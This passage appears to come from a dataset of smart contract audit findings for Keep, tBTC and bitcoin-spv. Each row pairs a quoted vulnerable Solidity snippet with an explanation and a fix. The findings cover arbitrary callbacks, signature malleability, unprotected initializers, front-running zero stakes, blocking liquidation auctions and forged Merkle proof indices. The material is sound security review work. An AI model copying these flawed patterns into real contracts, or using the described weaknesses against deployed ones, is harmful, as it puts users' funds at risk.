number).\\n \\* @param callbackContract Callback contract address. Callback is called once a new relay entry has been generated.\\n \\* @param callbackMethod Callback contract method signature. String representation of your method with a single\\n \\* uint256 input parameter i.e. ""relayEntryCallback(uint256)"".\\n \\* @param callbackGas Gas required for the callback.\\n \\* The customer needs to ensure they provide a sufficient callback gas\\n \\* to cover the gas fee of executing the callback. Any surplus is returned\\n \\* to the customer. If the callback gas amount turns to be not enough to\\n \\* execute the callback, callback execution is skipped.\\n \\* @return An uint256 representing uniquely generated relay request ID. It is also returned as part of the event.\\n \\*/\\nfunction requestRelayEntry(\\n address callbackContract,\\n string memory callbackMethod,\\n uint256 callbackGas\\n) public nonReentrant payable returns (uint256) {\\n```\\n\\nOnce an operator contract receives the relay entry, it calls executeCallback:\\n```\\n/\\*\\*\\n \\* @dev Executes customer specified callback for the relay entry request.\\n \\* @param requestId Request id tracked internally by this contract.\\n \\* @param entry The generated random number.\\n \\* @return Address to receive callback surplus.\\n \\*/\\nfunction executeCallback(uint256 requestId, uint256 entry) public returns (address payable surplusRecipient) {\\n require(\\n \\_operatorContracts.contains(msg.sender),\\n ""Only authorized operator contract can call execute callback.""\\n );\\n\\n require(\\n \\_callbacks[requestId].callbackContract != address(0),\\n ""Callback contract not found""\\n );\\n\\n \\_callbacks[requestId].callbackContract.call(abi.encodeWithSignature(\\_callbacks[requestId].callbackMethod, entry));\\n\\n surplusRecipient = \\_callbacks[requestId].surplusRecipient;\\n delete \\_callbacks[requestId];\\n}\\n```\\n\\nArbitrary callbacks can be used to force the service contract to execute many 
functions within the keep contract system. Currently, the `KeepRandomBeaconOperator` includes an `onlyServiceContract` modifier:\\n```\\n/\\*\\*\\n \\* @dev Checks if sender is authorized.\\n \\*/\\nmodifier onlyServiceContract() {\\n require(\\n serviceContracts.contains(msg.sender),\\n ""Caller is not an authorized contract""\\n );\\n \\_;\\n}\\n```\\n\\nThe functions it protects cannot be targeted by the aforementioned service contract callbacks due to Solidity's `CALLDATASIZE` checking. However, the presence of the modifier suggests that the service contract is expected to be a permissioned actor within some contracts.","Stick to a constant callback method signature, rather than allowing users to submit an arbitrary string. An example is `__beaconCallback__(uint256)`.\\nConsider disallowing arbitrary callback destinations. Instead, rely on contracts making requests directly, and default the callback destination to `msg.sender`. Ensure the sender is not an EOA.",,"```\\n/\\*\\*\\n \\* @dev Creates a request to generate a new relay entry, which will include\\n \\* a random number (by signing the previous entry's random number).\\n \\* @param callbackContract Callback contract address. Callback is called once a new relay entry has been generated.\\n \\* @param callbackMethod Callback contract method signature. String representation of your method with a single\\n \\* uint256 input parameter i.e. ""relayEntryCallback(uint256)"".\\n \\* @param callbackGas Gas required for the callback.\\n \\* The customer needs to ensure they provide a sufficient callback gas\\n \\* to cover the gas fee of executing the callback. Any surplus is returned\\n \\* to the customer. If the callback gas amount turns to be not enough to\\n \\* execute the callback, callback execution is skipped.\\n \\* @return An uint256 representing uniquely generated relay request ID. 
It is also returned as part of the event.\\n \\*/\\nfunction requestRelayEntry(\\n address callbackContract,\\n string memory callbackMethod,\\n uint256 callbackGas\\n) public nonReentrant payable returns (uint256) {\\n```\\n" +tbtc - Disallow signatures with high-s values in DepositRedemption.provideRedemptionSignature,medium,"`DepositRedemption.provideRedemptionSignature` is used by signers to publish a signature that can be used to redeem a deposit on Bitcoin. The function accepts a signature s value in the upper half of the secp256k1 curve:\\n```\\nfunction provideRedemptionSignature(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) public {\\n require(\\_d.inAwaitingWithdrawalSignature(), ""Not currently awaiting a signature"");\\n\\n // If we're outside of the signature window, we COULD punish signers here\\n // Instead, we consider this a no-harm-no-foul situation.\\n // The signers have not stolen funds. Most likely they've just inconvenienced someone\\n\\n // The signature must be valid on the pubkey\\n require(\\n \\_d.signerPubkey().checkSig(\\n \\_d.lastRequestedDigest,\\n \\_v, \\_r, \\_s\\n ),\\n ""Invalid signature""\\n );\\n```\\n\\nAlthough `ecrecover` accepts signatures with these s values, they are no longer used in Bitcoin. As such, the signature will appear to be valid to the Ethereum smart contract, but will likely not be accepted on Bitcoin. 
If no users watching malleate the signature, the redemption process will likely enter a fee increase loop, incurring a cost on the deposit owner.","Ensure the passed-in s value is restricted to the lower half of the secp256k1 curve, as done in BondedECDSAKeep:\\n```\\n// Validate `s` value for a malleability concern described in EIP-2.\\n// Only signatures with `s` value in the lower half of the secp256k1\\n// curve's order are considered valid.\\nrequire(\\n uint256(\\_s) <=\\n 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0,\\n ""Malleable signature - s should be in the low half of secp256k1 curve's order""\\n);\\n```\\n",,"```\\nfunction provideRedemptionSignature(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) public {\\n require(\\_d.inAwaitingWithdrawalSignature(), ""Not currently awaiting a signature"");\\n\\n // If we're outside of the signature window, we COULD punish signers here\\n // Instead, we consider this a no-harm-no-foul situation.\\n // The signers have not stolen funds. Most likely they've just inconvenienced someone\\n\\n // The signature must be valid on the pubkey\\n require(\\n \\_d.signerPubkey().checkSig(\\n \\_d.lastRequestedDigest,\\n \\_v, \\_r, \\_s\\n ),\\n ""Invalid signature""\\n );\\n```\\n" +Consistent use of SafeERC20 for external tokens,medium,"Use `SafeERC20` features to interact with potentially broken tokens used in the system. E.g. 
`TokenGrant.receiveApproval()` is using `safeTransferFrom` while other contracts aren't.\\n`TokenGrant.receiveApproval` using `safeTransferFrom`\\n```\\ntoken.safeTransferFrom(\\_from, address(this), \\_amount);\\n```\\n\\n`TokenStaking.receiveApproval` not using `safeTransferFrom` while `safeTransfer` is being used.\\n```\\ntoken.transferFrom(\\_from, address(this), \\_value);\\n```\\n\\n```\\ntoken.safeTransfer(owner, amount);\\n```\\n\\n```\\ntoken.transfer(tattletale, tattletaleReward);\\n```\\n\\n`distributeERC20ToMembers` not using `safeTransferFrom`\\n```\\ntoken.transferFrom(\\n msg.sender,\\n tokenStaking.magpieOf(members[i]),\\n dividend\\n);\\n```\\n",Consistently use `SafeERC20` to support potentially broken tokens external to the system.,,"```\\ntoken.safeTransferFrom(\\_from, address(this), \\_amount);\\n```\\n" +Initialize implementations for proxy contracts and protect initialization methods,medium,"It should be avoided that the implementation for proxy contracts can be initialized by third parties. This can be the case if the `initialize` function is unprotected. Since the implementation contract is not meant to be used directly without a proxy delegate-calling it is recommended to protect the initialization method of the implementation by initializing on deployment.\\nChanging the proxies implementation (upgradeTo()) to a version that does not protect the initialization method may allow someone to front-run and initialize the contract if it is not done within the same transaction.\\n`KeepVendor` delegates to `KeepVendorImplV1`. 
The implementations initialization method is unprotected.\\n```\\n/// @notice Initializes Keep Vendor contract implementation.\\n/// @param registryAddress Keep registry contract linked to this contract.\\nfunction initialize(\\n address registryAddress\\n)\\n public\\n{\\n require(!initialized(), ""Contract is already initialized."");\\n \\_initialized[""BondedECDSAKeepVendorImplV1""] = true;\\n registry = Registry(registryAddress);\\n}\\n```\\n\\n`KeepRandomBeaconServiceImplV1` and `KeepRandomBeaconServiceUpgradeExample`\\n```\\nfunction initialize(\\n uint256 priceFeedEstimate,\\n uint256 fluctuationMargin,\\n uint256 dkgContributionMargin,\\n uint256 withdrawalDelay,\\n address registry\\n)\\n public\\n{\\n require(!initialized(), ""Contract is already initialized."");\\n \\_initialized[""KeepRandomBeaconServiceImplV1""] = true;\\n \\_priceFeedEstimate = priceFeedEstimate;\\n \\_fluctuationMargin = fluctuationMargin;\\n \\_dkgContributionMargin = dkgContributionMargin;\\n \\_withdrawalDelay = withdrawalDelay;\\n \\_pendingWithdrawal = 0;\\n \\_previousEntry = \\_beaconSeed;\\n \\_registry = registry;\\n \\_baseCallbackGas = 18845;\\n}\\n```\\n\\n`Deposit` is deployed via `cloneFactory` delegating to a `masterDepositAddress` in `DepositFactory`. The `masterDepositAddress` (Deposit) might be left uninitialized.\\n```\\ncontract DepositFactoryAuthority {\\n\\n bool internal \\_initialized = false;\\n address internal \\_depositFactory;\\n\\n /// @notice Set the address of the System contract on contract initialization\\n function initialize(address \\_factory) public {\\n require(! \\_initialized, ""Factory can only be initialized once."");\\n\\n \\_depositFactory = \\_factory;\\n \\_initialized = true;\\n }\\n```\\n",Initialize unprotected implementation contracts in the implementation's constructor. 
Protect initialization methods from being called by unauthorized parties or ensure that deployment of the proxy and initialization is performed in the same transaction.,,"```\\n/// @notice Initializes Keep Vendor contract implementation.\\n/// @param registryAddress Keep registry contract linked to this contract.\\nfunction initialize(\\n address registryAddress\\n)\\n public\\n{\\n require(!initialized(), ""Contract is already initialized."");\\n \\_initialized[""BondedECDSAKeepVendorImplV1""] = true;\\n registry = Registry(registryAddress);\\n}\\n```\\n" +"keep-tecdsa - If caller sends more than is contained in the signer subsidy pool, the value is burned",medium,"The signer subsidy pool in `BondedECDSAKeepFactory` tracks funds sent to the contract. Each time a keep is opened, the subsidy pool is intended to be distributed to the members of the new keep:\\n```\\n// If subsidy pool is non-empty, distribute the value to signers but\\n// never distribute more than the payment for opening a keep.\\nuint256 signerSubsidy = subsidyPool < msg.value\\n ? subsidyPool\\n : msg.value;\\nif (signerSubsidy > 0) {\\n subsidyPool -= signerSubsidy;\\n keep.distributeETHToMembers.value(signerSubsidy)();\\n}\\n```\\n\\nThe tracking around subsidy pool increases is inconsistent, and can lead to sent value being burned. In the case that `subsidyPool` contains less Ether than is sent in `msg.value`, `msg.value` is unused and remains in the contract. 
It may or may not be added to `subsidyPool`, depending on the return status of the random beacon:\\n```\\n(bool success, ) = address(randomBeacon).call.gas(400000).value(msg.value)(\\n abi.encodeWithSignature(\\n ""requestRelayEntry(address,string,uint256)"",\\n address(this),\\n ""setGroupSelectionSeed(uint256)"",\\n callbackGas\\n )\\n);\\nif (!success) {\\n subsidyPool += msg.value; // beacon is busy\\n}\\n```\\n","Rather than tracking the `subsidyPool` individually, simply distribute `this.balance` to each new keep's members.",,"```\\n// If subsidy pool is non-empty, distribute the value to signers but\\n// never distribute more than the payment for opening a keep.\\nuint256 signerSubsidy = subsidyPool < msg.value\\n ? subsidyPool\\n : msg.value;\\nif (signerSubsidy > 0) {\\n subsidyPool -= signerSubsidy;\\n keep.distributeETHToMembers.value(signerSubsidy)();\\n}\\n```\\n" +keep-core - TokenGrant and TokenStaking allow staking zero amount of tokens and front-running,medium,"Tokens are staked via the callback `receiveApproval()` which is normally invoked when calling `approveAndCall()`. The method is not restricting who can initiate the staking of tokens and relies on the fact that the token transfer to the `TokenStaking` contract is pre-approved by the owner, otherwise, the call would revert.\\nHowever, `receiveApproval()` allows the staking of a zero amount of tokens. The only check performed on the number of tokens transferred is, that the token holders balance covers the amount to be transferred. This check is both relatively weak - having enough balance does not imply that tokens are approved for transfer - and does not cover the fact that someone can call the method with a zero amount of tokens.\\nThis way someone could create an arbitrary number of operators staking no tokens at all. 
This passes the token balance check, `token.transferFrom()` will succeed and an operator struct with a zero stake and arbitrary values for `operator, from, magpie, authorizer` can be set. Finally, an event is emitted for a zero stake.\\nAn attacker could front-run calls to `receiveApproval` to block staking of a legitimate operator by creating a zero stake entry for the operator before she is able to. This vector might allow someone to permanently inconvenience an operator's address. To recover from this situation one could be forced to `cancelStake` terminating the zero stake struct in order to call the contract with the correct stake again.\\nThe same issue exists for `TokenGrant`.\\n```\\n/\\*\\*\\n \\* @notice Receives approval of token transfer and stakes the approved amount.\\n \\* @dev Makes sure provided token contract is the same one linked to this contract.\\n \\* @param \\_from The owner of the tokens who approved them to transfer.\\n \\* @param \\_value Approved amount for the transfer and stake.\\n \\* @param \\_token Token contract address.\\n \\* @param \\_extraData Data for stake delegation. 
This byte array must have the\\n \\* following values concatenated: Magpie address (20 bytes) where the rewards for participation\\n \\* are sent, operator's (20 bytes) address, authorizer (20 bytes) address.\\n \\*/\\nfunction receiveApproval(address \\_from, uint256 \\_value, address \\_token, bytes memory \\_extraData) public {\\n require(ERC20Burnable(\\_token) == token, ""Token contract must be the same one linked to this contract."");\\n require(\\_value <= token.balanceOf(\\_from), ""Sender must have enough tokens."");\\n require(\\_extraData.length == 60, ""Stake delegation data must be provided."");\\n\\n address payable magpie = address(uint160(\\_extraData.toAddress(0)));\\n address operator = \\_extraData.toAddress(20);\\n require(operators[operator].owner == address(0), ""Operator address is already in use."");\\n address authorizer = \\_extraData.toAddress(40);\\n\\n // Transfer tokens to this contract.\\n token.transferFrom(\\_from, address(this), \\_value);\\n\\n operators[operator] = Operator(\\_value, block.number, 0, \\_from, magpie, authorizer);\\n ownerOperators[\\_from].push(operator);\\n\\n emit Staked(operator, \\_value);\\n}\\n```\\n",Require tokens to be staked and explicitly disallow the zero amount of tokens case. The balance check can be removed.\\nNote: Consider checking the calls return value or calling the contract via `SafeERC20` to support potentially broken tokens that do not revert in error cases (token.transferFrom).,,"```\\n/\\*\\*\\n \\* @notice Receives approval of token transfer and stakes the approved amount.\\n \\* @dev Makes sure provided token contract is the same one linked to this contract.\\n \\* @param \\_from The owner of the tokens who approved them to transfer.\\n \\* @param \\_value Approved amount for the transfer and stake.\\n \\* @param \\_token Token contract address.\\n \\* @param \\_extraData Data for stake delegation. 
This byte array must have the\\n \\* following values concatenated: Magpie address (20 bytes) where the rewards for participation\\n \\* are sent, operator's (20 bytes) address, authorizer (20 bytes) address.\\n \\*/\\nfunction receiveApproval(address \\_from, uint256 \\_value, address \\_token, bytes memory \\_extraData) public {\\n require(ERC20Burnable(\\_token) == token, ""Token contract must be the same one linked to this contract."");\\n require(\\_value <= token.balanceOf(\\_from), ""Sender must have enough tokens."");\\n require(\\_extraData.length == 60, ""Stake delegation data must be provided."");\\n\\n address payable magpie = address(uint160(\\_extraData.toAddress(0)));\\n address operator = \\_extraData.toAddress(20);\\n require(operators[operator].owner == address(0), ""Operator address is already in use."");\\n address authorizer = \\_extraData.toAddress(40);\\n\\n // Transfer tokens to this contract.\\n token.transferFrom(\\_from, address(this), \\_value);\\n\\n operators[operator] = Operator(\\_value, block.number, 0, \\_from, magpie, authorizer);\\n ownerOperators[\\_from].push(operator);\\n\\n emit Staked(operator, \\_value);\\n}\\n```\\n" +tbtc - Inconsistency between increaseRedemptionFee and provideRedemptionProof may create un-provable redemptions,medium,"`DepositRedemption.increaseRedemptionFee` is used by signers to approve a signable bitcoin transaction with a higher fee, in case the network is congested and miners are not approving the lower-fee transaction.\\nFee increases can be performed every 4 hours:\\n```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), ""Fee increase not yet permitted"");\\n```\\n\\nIn addition, each increase must increment the fee by exactly the initial proposed fee:\\n```\\n// Check that we're incrementing the fee by exactly the redeemer's initial fee\\nuint256 \\_previousOutputValue = DepositUtils.bytes8LEToUint(\\_previousOutputValueBytes);\\n\\_newOutputValue = 
DepositUtils.bytes8LEToUint(\\_newOutputValueBytes);\\nrequire(\\_previousOutputValue.sub(\\_newOutputValue) == \\_d.initialRedemptionFee, ""Not an allowed fee step"");\\n```\\n\\nOutside of these two restrictions, there is no limit to the number of times `increaseRedemptionFee` can be called. Over a 20-hour period, for example, `increaseRedemptionFee` could be called 5 times, increasing the fee to `initialRedemptionFee * 5`. Over a 24-hour period, `increaseRedemptionFee` could be called 6 times, increasing the fee to `initialRedemptionFee * 6`.\\nEventually, it is expected that a transaction will be submitted and mined. At this point, anyone can call `DepositRedemption.provideRedemptionProof`, finalizing the redemption process and rewarding the signers. However, `provideRedemptionProof` will fail if the transaction fee is too high:\\n```\\nrequire((\\_d.utxoSize().sub(\\_fundingOutputValue)) <= \\_d.initialRedemptionFee \\* 5, ""Fee unexpectedly very high"");\\n```\\n\\nIn the case that `increaseRedemptionFee` is called 6 times and the signers provide a signature for this transaction, the transaction can be submitted and mined but `provideRedemptionProof` for this will always fail. 
Eventually, a redemption proof timeout will trigger the deposit into liquidation and the signers will be punished.","Because it is difficult to say with certainty that a 5x fee increase will always ensure a transaction's redeemability, the upper bound on fee bumps should be removed from `provideRedemptionProof`.\\nThis should be implemented in tandem with https://github.com/ConsenSys/thesis-tbtc-audit-2020-01/issues/38, so that signers cannot provide a proof that bypasses `increaseRedemptionFee` flow to spend the highest fee possible.",,"```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), ""Fee increase not yet permitted"");\\n```\\n" +keep-tecdsa - keep cannot be closed if a members bond was seized or fully reassigned,medium,"A keep cannot be closed if the bonds have been completely reassigned or seized before, leaving at least one member with zero `lockedBonds`. In this case `closeKeep()` will throw in `freeMembersBonds()` because the requirement in `keepBonding.freeBond` is not satisfied anymore (lockedBonds[bondID] > 0). As a result of this, none of the potentially remaining bonds (reassign) are freed, the keep stays active even though it should be closed.\\n```\\n/// @notice Closes keep when owner decides that they no longer need it.\\n/// Releases bonds to the keep members. 
Keep can be closed only when\\n/// there is no signing in progress or requested signing process has timed out.\\n/// @dev The function can be called by the owner of the keep and only is the\\n/// keep has not been closed already.\\nfunction closeKeep() external onlyOwner onlyWhenActive {\\n require(\\n !isSigningInProgress() || hasSigningTimedOut(),\\n ""Requested signing has not timed out yet""\\n );\\n\\n isActive = false;\\n\\n freeMembersBonds();\\n\\n emit KeepClosed();\\n}\\n\\n/// @notice Returns bonds to the keep members.\\nfunction freeMembersBonds() internal {\\n for (uint256 i = 0; i < members.length; i++) {\\n keepBonding.freeBond(members[i], uint256(address(this)));\\n }\\n}\\n```\\n\\n```\\n/// @notice Releases the bond and moves the bond value to the operator's\\n/// unbounded value pool.\\n/// @dev Function requires that caller is the holder of the bond which is\\n/// being released.\\n/// @param operator Address of the bonded operator.\\n/// @param referenceID Reference ID of the bond.\\nfunction freeBond(address operator, uint256 referenceID) public {\\n address holder = msg.sender;\\n bytes32 bondID = keccak256(\\n abi.encodePacked(operator, holder, referenceID)\\n );\\n\\n require(lockedBonds[bondID] > 0, ""Bond not found"");\\n\\n uint256 amount = lockedBonds[bondID];\\n lockedBonds[bondID] = 0;\\n unbondedValue[operator] = amount;\\n}\\n```\\n",Make sure the keep can be set to an end-state (closed/inactive) indicating its end-of-life even if the bond has been seized before. Avoid throwing an exception when freeing member bonds to avoid blocking the unlocking of bonds.,,"```\\n/// @notice Closes keep when owner decides that they no longer need it.\\n/// Releases bonds to the keep members. 
Keep can be closed only when\\n/// there is no signing in progress or requested signing process has timed out.\\n/// @dev The function can be called by the owner of the keep and only is the\\n/// keep has not been closed already.\\nfunction closeKeep() external onlyOwner onlyWhenActive {\\n require(\\n !isSigningInProgress() || hasSigningTimedOut(),\\n ""Requested signing has not timed out yet""\\n );\\n\\n isActive = false;\\n\\n freeMembersBonds();\\n\\n emit KeepClosed();\\n}\\n\\n/// @notice Returns bonds to the keep members.\\nfunction freeMembersBonds() internal {\\n for (uint256 i = 0; i < members.length; i++) {\\n keepBonding.freeBond(members[i], uint256(address(this)));\\n }\\n}\\n```\\n" +tbtc - provideFundingECDSAFraudProof attempts to burn non-existent funds,medium,"The funding flow was recently changed from requiring the funder to provide a bond that stays in the Deposit contract to forwarding the funds to the keep, paying for the keep setup.\\nSo at a high level, the funding bond was designed to ensure that funders had some minimum skin in the game, so that DoSing signers/the system was expensive. The upside was that we could refund it in happy paths. Now that we've realized that opening the keep itself will cost enough to prevent DoS, the concept of refunding goes away entirely. 
We definitely missed cleaning up the funder handling in provideFundingECDSAFraudProof though.\\n```\\n// If the funding timeout has elapsed, punish the funder too!\\nif (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n```\\n",Remove the line that attempts to punish the funder by burning the Deposit contract balance which is zero due to recent changes in how the payment provided with createNewDepositis handled.,,"```\\n// If the funding timeout has elapsed, punish the funder too!\\nif (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n```\\n" +bitcoin-spv - Bitcoin output script length is not checked in wpkhSpendSighash Won't Fix,medium,"`CheckBitcoinSigs.wpkhSpendSighash` calculates the sighash of a Bitcoin transaction. 
Among its parameters, it accepts `bytes memory _outpoint`, which is a 36-byte UTXO id consisting of a 32-byte transaction hash and a 4-byte output index.\\nThe function in question should not accept an `_outpoint` that is not 36-bytes, but no length check is made:\\n```\\nfunction wpkhSpendSighash(\\n bytes memory \\_outpoint, // 36 byte UTXO id\\n bytes20 \\_inputPKH, // 20 byte hash160\\n bytes8 \\_inputValue, // 8-byte LE\\n bytes8 \\_outputValue, // 8-byte LE\\n bytes memory \\_outputScript // lenght-prefixed output script\\n) internal pure returns (bytes32) {\\n // Fixes elements to easily make a 1-in 1-out sighash digest\\n // Does not support timelocks\\n bytes memory \\_scriptCode = abi.encodePacked(\\n hex""1976a914"", // length, dup, hash160, pkh\\_length\\n \\_inputPKH,\\n hex""88ac""); // equal, checksig\\n bytes32 \\_hashOutputs = abi.encodePacked(\\n \\_outputValue, // 8-byte LE\\n \\_outputScript).hash256();\\n bytes memory \\_sighashPreimage = abi.encodePacked(\\n hex""01000000"", // version\\n \\_outpoint.hash256(), // hashPrevouts\\n hex""8cb9012517c817fead650287d61bdd9c68803b6bf9c64133dcab3e65b5a50cb9"", // hashSequence(00000000)\\n \\_outpoint, // outpoint\\n \\_scriptCode, // p2wpkh script code\\n \\_inputValue, // value of the input in 8-byte LE\\n hex""00000000"", // input nSequence\\n \\_hashOutputs, // hash of the single output\\n hex""00000000"", // nLockTime\\n hex""01000000"" // SIGHASH\\_ALL\\n );\\n return \\_sighashPreimage.hash256();\\n}\\n```\\n",Check that `_outpoint.length` is 36.,,"```\\nfunction wpkhSpendSighash(\\n bytes memory \\_outpoint, // 36 byte UTXO id\\n bytes20 \\_inputPKH, // 20 byte hash160\\n bytes8 \\_inputValue, // 8-byte LE\\n bytes8 \\_outputValue, // 8-byte LE\\n bytes memory \\_outputScript // lenght-prefixed output script\\n) internal pure returns (bytes32) {\\n // Fixes elements to easily make a 1-in 1-out sighash digest\\n // Does not support timelocks\\n bytes memory \\_scriptCode = abi.encodePacked(\\n 
hex""1976a914"", // length, dup, hash160, pkh\\_length\\n \\_inputPKH,\\n hex""88ac""); // equal, checksig\\n bytes32 \\_hashOutputs = abi.encodePacked(\\n \\_outputValue, // 8-byte LE\\n \\_outputScript).hash256();\\n bytes memory \\_sighashPreimage = abi.encodePacked(\\n hex""01000000"", // version\\n \\_outpoint.hash256(), // hashPrevouts\\n hex""8cb9012517c817fead650287d61bdd9c68803b6bf9c64133dcab3e65b5a50cb9"", // hashSequence(00000000)\\n \\_outpoint, // outpoint\\n \\_scriptCode, // p2wpkh script code\\n \\_inputValue, // value of the input in 8-byte LE\\n hex""00000000"", // input nSequence\\n \\_hashOutputs, // hash of the single output\\n hex""00000000"", // nLockTime\\n hex""01000000"" // SIGHASH\\_ALL\\n );\\n return \\_sighashPreimage.hash256();\\n}\\n```\\n" +tbtc - liquidationInitiator can block purchaseSignerBondsAtAuction indefinitely,medium,"When reporting a fraudulent proof the deposits `liquidationInitiator` is set to the entity reporting and proofing the fraud. The deposit that is in a `*_liquidation_in_progress` state can be bought by anyone at an auction calling `purchaseSignerBondsAtAuction`.\\nInstead of receiving a share of the funds the `liquidationInitiator` can decide to intentionally reject the funds by raising an exception causing `initiator.transfer(contractEthBalance)` to throw, blocking the auction and forcing the liquidation to fail. The deposit will stay in one of the `*_liquidation_in_progress` states.\\n```\\n/// @notice Closes an auction and purchases the signer bonds. Payout to buyer, funder, then signers if not fraud\\n/// @dev For interface, reading auctionValue will give a past value. 
the current is better\\n/// @param \\_d deposit storage pointer\\nfunction purchaseSignerBondsAtAuction(DepositUtils.Deposit storage \\_d) public {\\n bool \\_wasFraud = \\_d.inFraudLiquidationInProgress();\\n require(\\_d.inSignerLiquidation(), ""No active auction"");\\n\\n \\_d.setLiquidated();\\n \\_d.logLiquidated();\\n\\n // send the TBTC to the TDT holder. If the TDT holder is the Vending Machine, burn it to maintain the peg.\\n address tdtHolder = \\_d.depositOwner();\\n\\n TBTCToken \\_tbtcToken = TBTCToken(\\_d.TBTCToken);\\n\\n uint256 lotSizeTbtc = \\_d.lotSizeTbtc();\\n require(\\_tbtcToken.balanceOf(msg.sender) >= lotSizeTbtc, ""Not enough TBTC to cover outstanding debt"");\\n\\n if(tdtHolder == \\_d.VendingMachine){\\n \\_tbtcToken.burnFrom(msg.sender, lotSizeTbtc); // burn minimal amount to cover size\\n }\\n else{\\n \\_tbtcToken.transferFrom(msg.sender, tdtHolder, lotSizeTbtc);\\n }\\n\\n // Distribute funds to auction buyer\\n uint256 \\_valueToDistribute = \\_d.auctionValue();\\n msg.sender.transfer(\\_valueToDistribute);\\n\\n // Send any TBTC left to the Fee Rebate Token holder\\n \\_d.distributeFeeRebate();\\n\\n // For fraud, pay remainder to the liquidation initiator.\\n // For non-fraud, split 50-50 between initiator and signers. 
if the transfer amount is 1,\\n // division will yield a 0 value which causes a revert; instead, \\n // we simply ignore such a tiny amount and leave some wei dust in escrow\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\n",Use a pull vs push funds pattern or use `address.send` instead of `address.transfer` which might leave some funds locked in the contract if it fails.,,"```\\n/// @notice Closes an auction and purchases the signer bonds. Payout to buyer, funder, then signers if not fraud\\n/// @dev For interface, reading auctionValue will give a past value. the current is better\\n/// @param \\_d deposit storage pointer\\nfunction purchaseSignerBondsAtAuction(DepositUtils.Deposit storage \\_d) public {\\n bool \\_wasFraud = \\_d.inFraudLiquidationInProgress();\\n require(\\_d.inSignerLiquidation(), ""No active auction"");\\n\\n \\_d.setLiquidated();\\n \\_d.logLiquidated();\\n\\n // send the TBTC to the TDT holder. 
If the TDT holder is the Vending Machine, burn it to maintain the peg.\\n address tdtHolder = \\_d.depositOwner();\\n\\n TBTCToken \\_tbtcToken = TBTCToken(\\_d.TBTCToken);\\n\\n uint256 lotSizeTbtc = \\_d.lotSizeTbtc();\\n require(\\_tbtcToken.balanceOf(msg.sender) >= lotSizeTbtc, ""Not enough TBTC to cover outstanding debt"");\\n\\n if(tdtHolder == \\_d.VendingMachine){\\n \\_tbtcToken.burnFrom(msg.sender, lotSizeTbtc); // burn minimal amount to cover size\\n }\\n else{\\n \\_tbtcToken.transferFrom(msg.sender, tdtHolder, lotSizeTbtc);\\n }\\n\\n // Distribute funds to auction buyer\\n uint256 \\_valueToDistribute = \\_d.auctionValue();\\n msg.sender.transfer(\\_valueToDistribute);\\n\\n // Send any TBTC left to the Fee Rebate Token holder\\n \\_d.distributeFeeRebate();\\n\\n // For fraud, pay remainder to the liquidation initiator.\\n // For non-fraud, split 50-50 between initiator and signers. if the transfer amount is 1,\\n // division will yield a 0 value which causes a revert; instead, \\n // we simply ignore such a tiny amount and leave some wei dust in escrow\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\n" +bitcoin-spv - verifyHash256Merkle allows existence proofs for the same leaf in multiple locations in the tree Won't Fix,medium,"`BTCUtils.verifyHash256Merkle` is used by `ValidateSPV.prove` to validate a transaction's existence in a Bitcoin block. The function accepts as input a `_proof` and an `_index`. 
The `_proof` consists of, in order: the transaction hash, a list of intermediate nodes, and the merkle root.\\nThe proof is performed iteratively, and uses the `_index` to determine whether the next proof element represents a “left branch” or a “right branch:”\\n```\\nuint \_idx = \_index;\\nbytes32 \_root = \_proof.slice(\_proof.length - 32, 32).toBytes32();\\nbytes32 \_current = \_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\_proof.length.div(32)) - 1; i++) {\\n if (\_idx % 2 == 1) {\\n \_current = \_hash256MerkleStep(\_proof.slice(i \* 32, 32), abi.encodePacked(\_current));\\n } else {\\n \_current = \_hash256MerkleStep(abi.encodePacked(\_current), \_proof.slice(i \* 32, 32));\\n }\\n \_idx = \_idx >> 1;\\n}\\nreturn \_current == \_root;\\n```\\n\\nIf `_idx` is even, the computed hash is placed before the next proof element. If `_idx` is odd, the computed hash is placed after the next proof element. After each iteration, `_idx` is decremented by `_idx /= 2`.\\n\\nBecause `verifyHash256Merkle` makes no requirements on the size of `_proof` relative to `_index`, it is possible to pass in invalid values for `_index` that prove a transaction's existence in multiple locations in the tree.\\n\\nBy modifying existing tests, we showed that any transaction can be proven to exist at least one alternate index. This alternate index is calculated as `(2 ** treeHeight) + prevIndex` - though other alternate indices are possible. 
